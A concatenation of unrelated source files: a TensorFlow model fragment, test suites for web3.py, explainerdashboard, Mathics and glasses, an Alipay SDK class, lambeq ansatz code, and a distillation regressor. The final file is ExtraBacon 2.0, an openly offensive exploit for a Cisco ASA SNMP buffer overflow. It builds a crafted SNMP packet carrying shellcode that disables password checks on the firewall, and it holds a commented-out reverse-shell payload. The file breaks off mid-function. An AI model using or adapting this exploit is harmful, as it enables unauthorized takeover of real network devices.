z_in = tf.concat([cond, out_shifted], -1)
z_out, *states = self.rnn1(z_in, training=training)
z_out, *states = self.rnn2(z_out, training=training)
output = self.decode_out(z_out)
output = self.sample_out(output, note_pitch)
return output
def encode_cond(self, cond, training=False):
z_pitch = self.pitch_emb(cond['note_pitch'])
z_duration = self.duration_emb(cond['note_length'])
z_instrument = self.instrument_emb(
tf.tile(cond['instrument_id'][:, tf.newaxis], [1, z_pitch.shape[1]]))
cond = tf.concat([z_pitch, z_duration, z_instrument], -1)
cond = self.birnn(cond, training=training)
return cond
def decode_out(self, z_out):
if self.norm is not None:
z_out = self.norm(z_out)
output = self.dense_out(z_out)
return output
def sample_out(self, out, note_pitch):
output = out.copy()
sampled_output = out['raw_output']
rest_note_mask = tf.cast(note_pitch != 0, tf.float32)
sampled_output *= rest_note_mask
output['output'] = sampled_output
return output
def call(self, cond, out=None, training=False):
if training:
outputs = self.teacher_force(cond, out, training=training)
else:
outputs = self.autoregressive(cond, training=training)
return outputs
def get_fake_data_expression_generator(target_dim):
instrument_id = tf.ones([1], dtype=tf.int64)
cond = {
'note_pitch': tf.ones([1, 32], dtype=tf.int64),
'note_length': tf.ones([1, 32, 1], dtype=tf.float32),
'instrument_id': instrument_id
}
target = tf.ones([1, 32, target_dim], dtype=tf.float32)
fake_data = {
'cond': cond,
'target': target
}
return fake_data
|
tests/core/middleware/test_gas_price_strategy.py | geofferyj/web3.py | 3,041 | 12688643 | import pytest
from unittest.mock import (
Mock,
)
from web3.middleware import (
gas_price_strategy_middleware,
)
@pytest.fixture
def the_gas_price_strategy_middleware(web3):
make_request, web3 = Mock(), Mock()
initialized = gas_price_strategy_middleware(make_request, web3)
initialized.web3 = web3
initialized.make_request = make_request
return initialized
def test_gas_price_generated(the_gas_price_strategy_middleware):
the_gas_price_strategy_middleware.web3.eth.generate_gas_price.return_value = 5
method = 'eth_sendTransaction'
params = ({
'to': '0x0',
'value': 1,
},)
the_gas_price_strategy_middleware(method, params)
the_gas_price_strategy_middleware.web3.eth.generate_gas_price.assert_called_once_with({
'to': '0x0',
'value': 1,
})
the_gas_price_strategy_middleware.make_request.assert_called_once_with(method, ({
'to': '0x0',
'value': 1,
'gasPrice': '0x5',
},))
def test_gas_price_not_overridden(the_gas_price_strategy_middleware):
the_gas_price_strategy_middleware.web3.eth.generate_gas_price.return_value = 5
method = 'eth_sendTransaction'
params = ({
'to': '0x0',
'value': 1,
'gasPrice': 10,
},)
the_gas_price_strategy_middleware(method, params)
the_gas_price_strategy_middleware.make_request.assert_called_once_with(method, ({
'to': '0x0',
'value': 1,
'gasPrice': 10,
},))
def test_gas_price_not_set_without_gas_price_strategy(the_gas_price_strategy_middleware):
the_gas_price_strategy_middleware.web3.eth.generate_gas_price.return_value = None
method = 'eth_sendTransaction'
params = ({
'to': '0x0',
'value': 1,
},)
the_gas_price_strategy_middleware(method, params)
the_gas_price_strategy_middleware.make_request.assert_called_once_with(method, params)
def test_not_generate_gas_price_when_not_send_transaction_rpc(the_gas_price_strategy_middleware):
the_gas_price_strategy_middleware.web3.getGasPriceStrategy = Mock()
the_gas_price_strategy_middleware('eth_getBalance', [])
the_gas_price_strategy_middleware.web3.getGasPriceStrategy.assert_not_called()
|
tests/test_linear_model.py | hugocool/explainerdashboard | 1,178 | 12688658 | import unittest
import pandas as pd
import numpy as np
import shap
import plotly.graph_objects as go
from sklearn.linear_model import LinearRegression, LogisticRegression
from explainerdashboard.explainers import RegressionExplainer, ClassifierExplainer
from explainerdashboard.datasets import titanic_fare, titanic_survive, titanic_names
class LinearRegressionTests(unittest.TestCase):
def setUp(self):
X_train, y_train, X_test, y_test = titanic_fare()
self.test_len = len(X_test)
train_names, test_names = titanic_names()
_, self.names = titanic_names()
model = LinearRegression()
model.fit(X_train, y_train)
self.explainer = RegressionExplainer(model, X_test, y_test,
shap='linear',
cats=[{'Gender': ['Sex_female', 'Sex_male', 'Sex_nan']},
'Deck', 'Embarked'],
idxs=test_names, units="$")
def test_explainer_len(self):
self.assertEqual(len(self.explainer), self.test_len)
def test_int_idx(self):
self.assertEqual(self.explainer.get_idx(self.names[0]), 0)
def test_random_index(self):
self.assertIsInstance(self.explainer.random_index(), int)
self.assertIsInstance(self.explainer.random_index(return_str=True), str)
def test_preds(self):
self.assertIsInstance(self.explainer.preds, np.ndarray)
def test_pred_percentiles(self):
self.assertIsInstance(self.explainer.pred_percentiles(), np.ndarray)
def test_permutation_importances(self):
self.assertIsInstance(self.explainer.get_permutation_importances_df(), pd.DataFrame)
def test_metrics(self):
self.assertIsInstance(self.explainer.metrics(), dict)
self.assertIsInstance(self.explainer.metrics_descriptions(), dict)
def test_mean_abs_shap_df(self):
self.assertIsInstance(self.explainer.get_mean_abs_shap_df(), pd.DataFrame)
def test_top_interactions(self):
self.assertIsInstance(self.explainer.top_shap_interactions("Age"), list)
self.assertIsInstance(self.explainer.top_shap_interactions("Age", topx=4), list)
def test_contrib_df(self):
self.assertIsInstance(self.explainer.get_contrib_df(0), pd.DataFrame)
self.assertIsInstance(self.explainer.get_contrib_df(0, topx=3), pd.DataFrame)
def test_shap_base_value(self):
self.assertIsInstance(self.explainer.shap_base_value(), (np.floating, float))
def test_shap_values_shape(self):
self.assertTrue(self.explainer.get_shap_values_df().shape == (len(self.explainer), len(self.explainer.merged_cols)))
def test_shap_values(self):
self.assertIsInstance(self.explainer.get_shap_values_df(), pd.DataFrame)
def test_mean_abs_shap(self):
self.assertIsInstance(self.explainer.get_mean_abs_shap_df(), pd.DataFrame)
def test_calculate_properties(self):
self.explainer.calculate_properties(include_interactions=False)
def test_pdp_df(self):
self.assertIsInstance(self.explainer.pdp_df("Age"), pd.DataFrame)
self.assertIsInstance(self.explainer.pdp_df("Gender"), pd.DataFrame)
self.assertIsInstance(self.explainer.pdp_df("Deck"), pd.DataFrame)
self.assertIsInstance(self.explainer.pdp_df("Age", index=0), pd.DataFrame)
self.assertIsInstance(self.explainer.pdp_df("Gender", index=0), pd.DataFrame)
class LogisticRegressionTests(unittest.TestCase):
def setUp(self):
X_train, y_train, X_test, y_test = titanic_survive()
train_names, test_names = titanic_names()
model = LogisticRegression()
model.fit(X_train, y_train)
self.explainer = ClassifierExplainer(
model, X_test, y_test,
shap='linear',
cats=['Sex', 'Deck', 'Embarked'],
labels=['Not survived', 'Survived'],
idxs=test_names)
def test_preds(self):
self.assertIsInstance(self.explainer.preds, np.ndarray)
def test_pred_percentiles(self):
self.assertIsInstance(self.explainer.pred_percentiles(), np.ndarray)
def test_columns_ranked_by_shap(self):
self.assertIsInstance(self.explainer.columns_ranked_by_shap(), list)
def test_permutation_importances(self):
self.assertIsInstance(self.explainer.get_permutation_importances_df(), pd.DataFrame)
def test_metrics(self):
self.assertIsInstance(self.explainer.metrics(), dict)
self.assertIsInstance(self.explainer.metrics_descriptions(), dict)
def test_mean_abs_shap_df(self):
self.assertIsInstance(self.explainer.get_mean_abs_shap_df(), pd.DataFrame)
def test_contrib_df(self):
self.assertIsInstance(self.explainer.get_contrib_df(0), pd.DataFrame)
self.assertIsInstance(self.explainer.get_contrib_df(0, topx=3), pd.DataFrame)
def test_shap_base_value(self):
self.assertIsInstance(self.explainer.shap_base_value(), (np.floating, float))
def test_shap_values_shape(self):
self.assertTrue(self.explainer.get_shap_values_df().shape == (len(self.explainer), len(self.explainer.merged_cols)))
def test_shap_values(self):
self.assertIsInstance(self.explainer.get_shap_values_df(), pd.DataFrame)
def test_mean_abs_shap(self):
self.assertIsInstance(self.explainer.get_mean_abs_shap_df(), pd.DataFrame)
def test_calculate_properties(self):
self.explainer.calculate_properties(include_interactions=False)
def test_pdp_df(self):
self.assertIsInstance(self.explainer.pdp_df("Age"), pd.DataFrame)
self.assertIsInstance(self.explainer.pdp_df("Sex"), pd.DataFrame)
self.assertIsInstance(self.explainer.pdp_df("Deck"), pd.DataFrame)
self.assertIsInstance(self.explainer.pdp_df("Age", index=0), pd.DataFrame)
self.assertIsInstance(self.explainer.pdp_df("Sex", index=0), pd.DataFrame)
def test_pos_label(self):
self.explainer.pos_label = 1
self.explainer.pos_label = "Not survived"
self.assertIsInstance(self.explainer.pos_label, int)
self.assertIsInstance(self.explainer.pos_label_str, str)
self.assertEqual(self.explainer.pos_label, 0)
self.assertEqual(self.explainer.pos_label_str, "Not survived")
def test_pred_probas(self):
self.assertIsInstance(self.explainer.pred_probas(), np.ndarray)
def test_metrics(self):
self.assertIsInstance(self.explainer.metrics(), dict)
self.assertIsInstance(self.explainer.metrics(cutoff=0.9), dict)
def test_precision_df(self):
self.assertIsInstance(self.explainer.get_precision_df(), pd.DataFrame)
self.assertIsInstance(self.explainer.get_precision_df(multiclass=True), pd.DataFrame)
self.assertIsInstance(self.explainer.get_precision_df(quantiles=4), pd.DataFrame)
def test_lift_curve_df(self):
self.assertIsInstance(self.explainer.get_liftcurve_df(), pd.DataFrame)
class LogisticRegressionKernelTests(unittest.TestCase):
def setUp(self):
X_train, y_train, X_test, y_test = titanic_survive()
train_names, test_names = titanic_names()
model = LogisticRegression()
model.fit(X_train, y_train)
self.explainer = ClassifierExplainer(
model, X_test.iloc[:20], y_test.iloc[:20],
shap='kernel', model_output='probability',
X_background=shap.sample(X_train, 5),
cats=[{'Gender': ['Sex_female', 'Sex_male', 'Sex_nan']},
'Deck', 'Embarked'],
labels=['Not survived', 'Survived'])
def test_shap_values(self):
self.assertIsInstance(self.explainer.shap_base_value(), (np.floating, float))
self.assertTrue(self.explainer.get_shap_values_df().shape == (len(self.explainer), len(self.explainer.merged_cols)))
self.assertIsInstance(self.explainer.get_shap_values_df(), pd.DataFrame)
class LinearRegressionKernelTests(unittest.TestCase):
def setUp(self):
X_train, y_train, X_test, y_test = titanic_fare()
self.test_len = len(X_test)
model = LinearRegression().fit(X_train, y_train)
self.explainer = RegressionExplainer(model, X_test.iloc[:20], y_test.iloc[:20], shap='kernel',
X_background=shap.sample(X_train, 5))
def test_shap_values(self):
self.assertIsInstance(self.explainer.shap_base_value(), (np.floating, float))
self.assertTrue(self.explainer.get_shap_values_df().shape == (len(self.explainer), len(self.explainer.merged_cols)))
self.assertIsInstance(self.explainer.get_shap_values_df(), pd.DataFrame)
|
test/test_formatter/test_asy.py | skirpichev/Mathics | 1,920 | 12688662 | import re
from mathics.core.expression import Symbol, Integer0, Integer1, Expression
from mathics.core.evaluation import Evaluation
from mathics.session import MathicsSession
from mathics.builtin.inout import MakeBoxes
session = MathicsSession(add_builtin=True, catch_interrupt=False)
evaluation = Evaluation(session.definitions)
GraphicsSymbol = Symbol("Graphics")
ListSymbol = Symbol("List")
asy_wrapper_pat = r"""^\s*
\s*\\begin{asy}
\s*usepackage\("amsmath"\);
\s*size\(.+\);
\s*
"""
def extract_asy_body(asy):
matches = re.match(asy_wrapper_pat, asy)
body = asy[len(matches.group(0)) :]
assert matches
print(body)
return body
def get_asy(expression):
boxes = MakeBoxes(expression).evaluate(evaluation)
return boxes.boxes_to_tex()
def test_asy_circle():
expression = Expression(
GraphicsSymbol,
Expression("Circle", Expression(ListSymbol, Integer0, Integer0)),
)
asy = get_asy(expression)
inner_asy = extract_asy_body(asy)
# Circles are implemented as ellipses with equal major and minor axes.
# Check for that.
matches = re.match(r"^draw\(ellipse\(\((.+),\s*(.+)\),(.*),(.*)\), .*", inner_asy)
assert matches
# Check that center point is centered and
# major and minor axes are the same
assert matches.group(1) == matches.group(2)
assert matches.group(3) == matches.group(4)
def test_asy_point():
expression = Expression(
GraphicsSymbol,
Expression("Point", Expression(ListSymbol, Integer0, Integer0)),
)
asy = get_asy(expression)
inner_asy = extract_asy_body(asy)
print(inner_asy)
# matches = re.match(r'^Circle\((.+), (.+), (.+)\),.+;', inner_asy)
matches = re.match(r"// PointBox\ndot\(\((.+), (.+)\), .+\);.*", inner_asy)
assert matches
# Since the x,y point is the same, we'll check that whatever this
# coordinate mapped to, it is the same.
assert matches.group(1) == matches.group(2)
def test_asy_arrowbox():
expression = Expression(
GraphicsSymbol,
Expression(
"Arrow",
Expression(
ListSymbol,
Expression(ListSymbol, Integer0, Integer0),
Expression(ListSymbol, Integer1, Integer1),
),
),
)
asy = get_asy(expression)
inner_asy = extract_asy_body(asy)
matches = re.match(r"^draw\(.*\)", inner_asy)
# TODO: Match line and arrowbox
assert matches
def test_asy_bezier_curve():
expression = Expression(
GraphicsSymbol,
Expression(
"BezierCurve",
Expression(
ListSymbol,
Expression(ListSymbol, Integer0, Integer0),
Expression(ListSymbol, Integer1, Integer1),
),
),
)
asy = get_asy(expression)
inner_asy = extract_asy_body(asy)
matches = re.match(r"// BezierCurveBox\nimport graph;", inner_asy)
# TODO: Match line and arrowbox
assert matches
if __name__ == "__main__":
test_asy_bezier_curve()
|
alipay/aop/api/domain/AlipayInsDataDsbRequestImageInfo.py | snowxmas/alipay-sdk-python-all | 213 | 12688667 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipayInsDataDsbRequestImageInfo(object):
def __init__(self):
self._image_name = None
self._image_path = None
@property
def image_name(self):
return self._image_name
@image_name.setter
def image_name(self, value):
self._image_name = value
@property
def image_path(self):
return self._image_path
@image_path.setter
def image_path(self, value):
self._image_path = value
def to_alipay_dict(self):
params = dict()
if self.image_name:
if hasattr(self.image_name, 'to_alipay_dict'):
params['image_name'] = self.image_name.to_alipay_dict()
else:
params['image_name'] = self.image_name
if self.image_path:
if hasattr(self.image_path, 'to_alipay_dict'):
params['image_path'] = self.image_path.to_alipay_dict()
else:
params['image_path'] = self.image_path
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayInsDataDsbRequestImageInfo()
if 'image_name' in d:
o.image_name = d['image_name']
if 'image_path' in d:
o.image_path = d['image_path']
return o
|
pattern/vector/svm/__init__.py | huihui7987/pattern | 6,201 | 12688681 | <reponame>huihui7987/pattern
from __future__ import absolute_import
from __future__ import division
LIBSVM = LIBLINEAR = True
try:
from . import libsvm
from . import libsvmutil
except ImportError as e:
LIBSVM = False
raise e
try:
from . import liblinear
from . import liblinearutil
except:
LIBLINEAR = False
|
lambeq/ansatz/tensor.py | CQCL/lambeq | 131 | 12688695 | # Copyright 2021, 2022 Cambridge Quantum Computing Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tensor Ansatz
=============
A tensor ansatz is used to convert a DisCoCat diagram into a tensor network.
"""
from __future__ import annotations
__all__ = ['TensorAnsatz', 'MPSAnsatz', 'SpiderAnsatz']
from collections.abc import Mapping
from functools import reduce
from typing import Any
from discopy import rigid, Ty, tensor, Word
from discopy.rigid import Cup, Spider
from discopy.tensor import Dim
from lambeq.ansatz import BaseAnsatz, Symbol
class TensorAnsatz(BaseAnsatz):
"""Base class for tensor network ansatz."""
def __init__(self, ob_map: Mapping[Ty, Dim], **kwargs: Any) -> None:
"""Instantiate a tensor network ansatz.
Parameters
----------
ob_map : dict
A mapping from :py:class:`discopy.rigid.Ty` to the dimension
space it uses in a tensor network.
**kwargs : dict
Extra parameters for ansatz configuration.
"""
self.ob_map = ob_map
self.functor = rigid.Functor(
ob=self._ob,
ar=self._ar, ar_factory=tensor.Diagram, ob_factory=tensor.Dim)
def _ob(self, type_: Ty) -> Dim:
return Dim().tensor(*[self.ob_map[Ty(t.name)] for t in type_])
def _ar(self, box: rigid.Box) -> tensor.Diagram:
name = self._summarise_box(box)
dom = self._ob(box.dom)
cod = self._ob(box.cod)
n_params = reduce(lambda x, y: x * y, dom @ cod, 1)
syms = Symbol(name, size=n_params)
return tensor.Box(box.name, dom, cod, syms)
def __call__(self, diagram: rigid.Diagram) -> tensor.Diagram:
"""Convert a DisCoPy diagram into a DisCoPy tensor."""
return self.functor(diagram)
class MPSAnsatz(TensorAnsatz):
"""Split large boxes into matrix product states."""
BOND_TYPE: Ty = Ty('B')
def __init__(self,
ob_map: Mapping[Ty, Dim],
bond_dim: int,
max_order: int = 3) -> None:
"""Instantiate a matrix product state ansatz.
Parameters
----------
ob_map : dict
A mapping from :py:class:`discopy.rigid.Ty` to the dimension
space it uses in a tensor network.
bond_dim: int
The size of the bonding dimension.
max_order: int
The maximum order of each tensor in the matrix product
state, which must be at least 3.
"""
if max_order < 3:
raise ValueError('`max_order` must be at least 3')
if self.BOND_TYPE in ob_map:
raise ValueError('specify bond dimension using `bond_dim`')
ob_map = dict(ob_map)
ob_map[self.BOND_TYPE] = Dim(bond_dim)
self.ob_map = ob_map
self.bond_dim = bond_dim
self.max_order = max_order
self.split_functor = rigid.Functor(ob=lambda ob: ob, ar=self._ar)
self.tensor_functor = rigid.Functor(
ob=self.ob_map,
ar=super()._ar, ar_factory=tensor.Diagram, ob_factory=tensor.Dim)
def _ar(self, ar: Word) -> rigid.Diagram:
bond = self.BOND_TYPE
if len(ar.cod) <= self.max_order:
return Word(f'{ar.name}_0', ar.cod)
boxes = []
cups = []
step_size = self.max_order - 2
for i, start in enumerate(range(0, len(ar.cod), step_size)):
cod = bond.r @ ar.cod[start:start+step_size] @ bond
boxes.append(Word(f'{ar.name}_{i}', cod))
cups += [rigid.Id(cod[1:-1]), Cup(bond, bond.r)]
boxes[0] = Word(boxes[0].name, boxes[0].cod[1:])
boxes[-1] = Word(boxes[-1].name, boxes[-1].cod[:-1])
return rigid.Box.tensor(*boxes) >> rigid.Diagram.tensor(*cups[:-1])
def __call__(self, diagram: rigid.Diagram) -> tensor.Diagram:
return self.tensor_functor(self.split_functor(diagram))
class SpiderAnsatz(TensorAnsatz):
"""Split large boxes into spiders."""
def __init__(self,
ob_map: Mapping[Ty, Dim],
max_order: int = 2) -> None:
"""Instantiate a spider ansatz.
Parameters
----------
ob_map : dict
A mapping from :py:class:`discopy.rigid.Ty` to the dimension
space it uses in a tensor network.
max_order: int
The maximum order of each tensor, which must be at least 2.
"""
if max_order < 2:
raise ValueError('`max_order` must be at least 2')
self.ob_map = ob_map
self.max_order = max_order
self.split_functor = rigid.Functor(ob=lambda ob: ob, ar=self._ar)
self.tensor_functor = rigid.Functor(
ob=self.ob_map,
ar=super()._ar, ar_factory=tensor.Diagram, ob_factory=tensor.Dim)
def _ar(self, ar: Word) -> rigid.Diagram:
if len(ar.cod) <= self.max_order:
return Word(f'{ar.name}_0', ar.cod)
boxes = []
spiders = [rigid.Id(ar.cod[:1])]
step_size = self.max_order - 1
for i, start in enumerate(range(0, len(ar.cod)-1, step_size)):
cod = ar.cod[start:start + step_size + 1]
boxes.append(Word(f'{ar.name}_{i}', cod))
spiders += [rigid.Id(cod[1:-1]), Spider(2, 1, cod[-1:])]
spiders[-1] = rigid.Id(spiders[-1].cod)
return rigid.Diagram.tensor(*boxes) >> rigid.Diagram.tensor(*spiders)
def __call__(self, diagram: rigid.Diagram) -> tensor.Diagram:
return self.tensor_functor(self.split_functor(diagram))
|
test/test_Tracker.py | rentainhe/glasses | 271 | 12688756 | <filename>test/test_Tracker.py
import torch
import torch.nn as nn
from glasses.utils.Tracker import Tracker
def test_tracker():
x = torch.rand(64, 1)
model = nn.Sequential(nn.Linear(1, 64), nn.ReLU(), nn.Linear(64,10), nn.ReLU())
tr = Tracker(model)
tr(x)
assert len(tr.traced) == 4
assert len(tr.parametrized) == 2
|
videoanalyst/data/target/target_impl/utils/debug_compare_densebox_target.py | TragedyN/SiamFCpp | 737 | 12688760 | <reponame>TragedyN/SiamFCpp<gh_stars>100-1000
import numpy as np
# from IPython import embed;embed()
from make_densebox_target import \
make_densebox_target as make_densebox_target_old
from make_densebox_target_dev import \
make_densebox_target as make_densebox_target_new
gt_boxes = np.asarray([[150, 250, 130, 60, 1]])
config_dict = dict(
x_size=303,
score_size=17,
total_stride=8,
score_offset=(303 - 1 - (17 - 1) * 8) // 2,
)
target_old = make_densebox_target_old(gt_boxes, config_dict)
target_new = make_densebox_target_new(gt_boxes, config_dict)
for v_old, v_new in zip(target_old, target_new):
v_new = v_new.numpy()
# uncomment the next line to inspect tensors in detail
# from IPython import embed;embed()
np.testing.assert_allclose(v_new, v_old, atol=1e-6, verbose=True)
print("Values closed.")
|
examples/undocumented/python/kernel_simple_locality_improved_string.py | tallamjr/shogun | 2,753 | 12688829 | <gh_stars>1000+
#!/usr/bin/env python
import shogun as sg
from tools.load import LoadMatrix
lm=LoadMatrix()
traindat = lm.load_dna('../data/fm_train_dna.dat')
testdat = lm.load_dna('../data/fm_test_dna.dat')
parameter_list = [[traindat,testdat,5,5,1],[traindat,testdat,5,3,2]]
def kernel_simple_locality_improved_string (fm_train_dna=traindat,fm_test_dna=testdat,
length=5,inner_degree=5,outer_degree=1):
feats_train=sg.create_string_features(fm_train_dna, sg.DNA)
feats_test=sg.create_string_features(fm_test_dna, sg.DNA)
kernel=sg.create_kernel("SimpleLocalityImprovedStringKernel", length=length, inner_degree=inner_degree, outer_degree=outer_degree)
kernel.init(feats_train, feats_train)
km_train=kernel.get_kernel_matrix()
kernel.init(feats_train, feats_test)
km_test=kernel.get_kernel_matrix()
return km_train,km_test,kernel
if __name__=='__main__':
print('SimpleLocalityImprovedString')
kernel_simple_locality_improved_string(*parameter_list[0])
|
imodels/util/distillation.py | csinva/interpretability-implementations-demos | 102 | 12688841 | from sklearn.base import RegressorMixin, BaseEstimator, is_regressor
class DistilledRegressor(BaseEstimator, RegressorMixin):
"""
Class to implement distillation. Currently only supports regression.
Params
------
teacher: initial model to be trained
must be a regressor or a binary classifier
student: model to be distilled from teacher's predictions
must be a regressor
"""
def __init__(self, teacher: BaseEstimator, student: BaseEstimator,
n_iters_teacher: int=1):
self.teacher = teacher
self.student = student
self.n_iters_teacher = n_iters_teacher
self._validate_student()
self._check_teacher_type()
def _validate_student(self):
if is_regressor(self.student):
pass
else:
if not hasattr(self.student, "prediction_task"):
raise ValueError("Student must be either a scikit-learn or imodels regressor")
elif self.student.prediction_task == "classification":
raise ValueError("Student must be a regressor")
def _check_teacher_type(self):
if hasattr(self.teacher, "prediction_task"):
self.teacher_type = self.teacher.prediction_task
elif hasattr(self.teacher, "_estimator_type"):
if is_regressor(self.teacher):
self.teacher_type = "regression"
else:
self.teacher_type = "classification"
def set_teacher_params(self, **params):
self.teacher.set_params(**params)
def set_student_params(self, **params):
self.student.set_params(**params)
def fit(self, X, y, **kwargs):
# fit teacher
for iter_teacher in range(self.n_iters_teacher):
self.teacher.fit(X, y, **kwargs)
if self.teacher_type == "regression":
y = self.teacher.predict(X)
else:
y = self.teacher.predict_proba(X)[:, 1] # assumes binary classifier
# fit student
self.student.fit(X, y)
def predict(self, X):
return self.student.predict(X)
|
extrabacon-2.0/extrabacon_2.0.py | JS-Burns/CVE-2016-6366 | 171 | 12688860 | <gh_stars>100-1000
#!/usr/bin/env python2
"""
Our goal with version 2.0 of ExtraBacon is to support more ASA versions, as well
as simplify the Python and payload shellcode. This means stripping as much as
possible from the shellcode and Python to still be functional.
"""
import sys
import string
import subprocess
import binascii
import random
import datetime
improved_dir = "./improved"
sys.path.insert(0, '..')
from Mexeggs.all import *
from Mexeggs import *
from scapy.all import *
##
##
##
class ExtrabaconInfoSubcommand(sploit.InfoSubcommand):
expect_filename_argument = False ##
def setup_parser(self, parser):
super(ExtrabaconInfoSubcommand, self).setup_parser(parser)
self.parser = parser
##
for a in self.parser._actions:
if a.dest == "version":
a.choices = ['v2c']
a.help = 'SNMP version (v2c only)'
def run(self, exp):
super(ExtrabaconInfoSubcommand, self).run(exp)
##
##
##
##
class ExtrabaconExecSubcommand(sploit.ExecSubcommand):
expect_filename_argument = False ##
def setup_parser(self, parser):
super(ExtrabaconExecSubcommand, self).setup_parser(parser)
self.parser = parser
##
for a in self.parser._actions:
if a.dest == "version":
a.choices = ['v2c']
a.help = 'SNMP version (v2c only)'
self.parser.add_argument('--mode',
help='select mode of operation',
choices=["pass-disable", "pass-enable", "mettle"],
required=True,
default=None)
self.parser.add_argument('--msg',
help='print success message on console of target (DO NOT USE)',
dest='msg',
action='store_true',
required=False,
default=False)
def run(self, exp):
super(ExtrabaconExecSubcommand, self).run(exp)
class Extrabacon(Sploit):
def setup_parser(self):
super(Extrabacon, self).setup_parser()
##
self.add_subcommand(ExtrabaconInfoSubcommand())
##
self.add_subcommand(ExtrabaconExecSubcommand())
##
##
def generate_touch(self):
return SNMP(version = self.params.version,
community = self.params.community,
PDU = SNMPget(varbindlist = [SNMPvarbind(oid = ASN1_OID('1.3.6.1.2.1.1.1.0')),
SNMPvarbind(oid = ASN1_OID('1.3.6.1.2.1.1.3.0')),
SNMPvarbind(oid = ASN1_OID('1.3.6.1.2.1.1.5.0'))]))
def fw_version_check(self, vers_string):
# let's try a more generic approach
version = vers_string.split("Version ")[1]
version = version.replace(".", "_")
# well this is crappy
fname = improved_dir + '/shellcode_' + version + '.py'
if not os.path.isfile(fname):
return "unsupported"
return version
def post_touch(self, response):
##
##
values = [x[SNMPvarbind].value.val for x in SNMP(response)[SNMP][SNMPresponse].varbindlist]
if not values:
return False
##
snmp = SNMP(response)
print "[+] response:"
snmp.show()
fw_uptime = values[1]
fw_uptime_str = str(datetime.timedelta(seconds=fw_uptime/100))
print
print "[+] firewall uptime is %d time ticks, or %s" % (fw_uptime, fw_uptime_str)
print
fw_name = values[2]
print "[+] firewall name is %s" % fw_name
print
fw_vers = self.fw_version_check(values[0])
if fw_vers != "unsupported":
print "[+] target is running %s, which is supported" % fw_vers
else:
print "[-] target is running %s, which is NOT supported" % values[0]
self.key_data = fw_vers ##
if self.params.verbose:
print 'Data stored in key file : %s' % self.key_data
##
##
return True
def load_vinfo(self):
self.vinfo = self.key_data.upper()
if self.params.verbose:
print 'Data stored in self.vinfo: %s' % self.vinfo
def report_key(self, key):
print "\nTo check the key file to see if it really contains what we're claiming:"
print "# cat %s" % self.get_key_file(key = key)
if self.key_data.lower() == "unsupported":
return
print "\nTo disable password checking on target:"
print "# %s exec -k %s %s --mode pass-disable" % (self.env.progname, key, " ".join(self.params.args[2:]))
print "\nTo enable password checking on target:"
print "# %s exec -k %s %s --mode pass-enable" % (self.env.progname, key, " ".join(self.params.args[2:]))
##
##
##
print
def generate_exploit(self):
if not self.params.mode:
print "[-] no mode selected!"
sys.exit(1)
print "[+] generating exploit for exec mode %s" % self.params.mode
if self.key_data.lower() == "unsupported":
print "[-] unsupported target version, abort"
sys.exit(1)
if os.path.exists(improved_dir):
print "[+] using shellcode in %s" % improved_dir
sys.path.insert(0, improved_dir)
else:
print "[-] cannot find %s" % (improved_dir)
sys.exit(1)
self.sc_filename = "shellcode_%s" % self.key_data.lower()
print "[+] importing version-specific shellcode %s" % self.sc_filename
try:
sc = __import__(self.sc_filename)
except:
print "[-] problem importing version-specific shellcode from %s" % self.sc_filename
sys.exit(1)
##
# cufwUrlfServerStatus + .9
head = '172.16.17.32.4.1.9.9.491.1.3.3.1.1.5.9'
head_len = len(head.split('.'))
# do we patch, or restore original code
if self.params.mode == 'pass-disable':
always_true_code = "192.168.127.12"
pmcheck_bytes = always_true_code
admauth_bytes = always_true_code
else:
pmcheck_bytes = sc.pmcheck_code
admauth_bytes = sc.admauth_code
preamble_snmp = ""
preamble_snmp += "172.16.17.32.49.201.49.192.96.49.210.128.197.16.128.194.7.4.125.80.187."
preamble_snmp += sc.pmcheck_bounds
preamble_snmp += ".205.128.88.187."
preamble_snmp += sc.admauth_bounds
preamble_snmp += ".205.128.199.5."
preamble_snmp += sc.pmcheck_offset
preamble_snmp += "."
preamble_snmp += pmcheck_bytes
preamble_snmp += ".199.5."
preamble_snmp += sc.admauth_offset
preamble_snmp += "."
preamble_snmp += admauth_bytes
preamble_snmp += ".97.104."
preamble_snmp += sc.saferet_offset
preamble_snmp += ".12172.16.17.32.11.15.15.15.137.229.131.197."
preamble_snmp += sc.fix_ebp
preamble_snmp += ".204.195"
if self.params.mode == 'mettle':
preamble_snmp = "172.16.17.32.49.201.49.192.96.49.210."
buf = ""
#buf += "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd"
#buf += "\x80\x97\x5b\x68\x0a\x1e\x0a\x89\x66\x68\x11\x5c\x66"
#buf += "\x53\x89\xe1\x6a\x66\x58\x50\x51\x57\x89\xe1\x43\xcd"
#buf += "\x80\x5b\x99\xb6\x0c\xb0\x03\xcd\x80"#\xff\xe1"
for c in buf:
preamble_snmp += "%d." % int(binascii.hexlify(c), 16)
preamble_snmp += "97.104."
preamble_snmp += sc.saferet_offset
preamble_snmp += ".128.195.16.191.11.15.15.15.137.229.131.197.72.195"
wrapper = preamble_snmp
wrapper_len = len(wrapper.split('.'))
wrapper += ".144" * (82 - wrapper_len)
##
launcher = "172.16.31.10.139.7.255.224.144"
overflow = string.join([head, "95", wrapper, sc.jmp_esp_offset, launcher], ".")
## removed superfluous length checks
if len(overflow.split('.')) != 112:
print "[-] problem with overflow_len (%d != 112)" % overflow_len
sys.exit(1)
self.params.request_id = random.randint(0x80000, 0x1fffffff)
print "[+] random SNMP request-id %d" % self.params.request_id
# we don't need to fix the launcher offset, only build 1 packet
# also, we can remove the payload varbind
exba_msg = SNMP(version=self.params.version,
community=self.params.community,
PDU=SNMPbulk(id=ASN1_INTEGER(self.params.request_id),
max_repetitions=1,
varbindlist=[SNMPvarbind(oid=ASN1_OID(overflow))]
)
)
if self.params.verbose:
print "overflow (112): %s" % overflow
print "EXBA msg (%d): %s" % (len(exba_msg), binascii.hexlify(exba_msg[SNMP].__str__()))
##
if len(exba_msg) >= 512:
